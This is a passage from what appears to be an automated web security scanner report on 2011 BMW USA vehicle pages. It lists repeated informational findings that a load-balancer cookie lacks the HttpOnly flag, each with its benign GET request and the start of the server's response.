Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:25 GMT;path=/
Content-Length: 239128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.366. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:15 GMT;path=/
Content-Length: 239129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.367. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:49 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:40:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:49 GMT;path=/
Content-Length: 201680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.368. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:34 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:34 GMT;path=/
Content-Length: 201681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.369. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:05:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:45:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:05:37 GMT;path=/
Content-Length: 212054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.370. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:01:50 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:41:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:01:50 GMT;path=/
Content-Length: 212055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.371. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:35 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:44:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:35 GMT;path=/
Content-Length: 224831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.372. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:31 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:44:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:31 GMT;path=/
Content-Length: 224832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.373. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:19 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:19 GMT;path=/
Content-Length: 239217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.374. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:07 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:42:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:07 GMT;path=/
Content-Length: 239218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.375. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:21 GMT;path=/
Content-Length: 201679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.376. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:03:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:43:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:03:00 GMT;path=/
Content-Length: 201680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.377. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:17:43 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:57:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:17:43 GMT;path=/
Content-Length: 199801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.378. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:31 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
